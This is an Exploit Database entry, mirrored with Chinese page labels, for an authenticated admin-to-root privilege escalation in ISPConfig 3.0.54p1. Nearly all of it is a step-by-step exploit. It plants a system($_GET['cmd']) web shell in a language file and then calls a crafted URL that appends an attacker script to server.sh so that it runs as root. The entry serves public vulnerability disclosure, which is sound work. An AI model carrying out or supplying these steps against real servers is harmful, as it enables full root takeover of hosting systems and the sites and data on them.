ISPConfig 3.0.54p1 – (Authenticated) Admin Privilege Escalation

• Exploit Database
• 8 阅读

• 作者： mra
  日期： 2014-08-02
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/34241/

• # Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
  # Date: 7/25/14
  # Exploit Author: mra
  # Vendor Homepage: http://wwwispconfig.org
  # Version: 3.0.54p1
  # Tested on: ubuntu, centos
  # irc.criten.net #elite-chat
  
  
  While logged in as admin user:
  
  
  1) add a shell user
  
  2) under option set gid to ispconfig
  
  3) log in as that user
  
  4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
  
  
  5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh
  
  
  6) create /tmp/script and put a command you wish to be executed as root.